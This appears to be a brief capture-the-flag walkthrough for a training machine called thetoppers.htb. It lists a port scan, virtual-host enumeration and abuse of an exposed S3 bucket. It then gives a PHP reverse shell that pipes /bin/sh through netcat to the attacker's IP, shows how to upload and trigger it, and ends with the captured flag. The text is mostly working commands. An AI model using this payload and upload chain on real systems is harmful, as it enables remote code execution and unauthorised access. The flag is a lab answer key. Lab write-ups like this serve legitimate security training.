Target IP: 10.129.111.196

Attacking IP: 10.10.14.115


flag:
a980d99281a28d638ac68b9bf9453c2b

Steps:
1. nmap -sV -p- 10.129.111.196
2. gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u thetoppers.htb --append-domain
3. Add s3.thetoppers.htb to /etc/hosts
4. aws --endpoint=http://s3.thetoppers.htb s3 ls thetoppers.htb
5. Create a reverse shell php file

   <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1    |nc 10.10.14.115 1261 >/tmp/f"); ?>

6. aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
7. nc -lvnp 1261
8. Go to http://thetoppers.htb/shell.php
9. cat /var/www/flag.txt


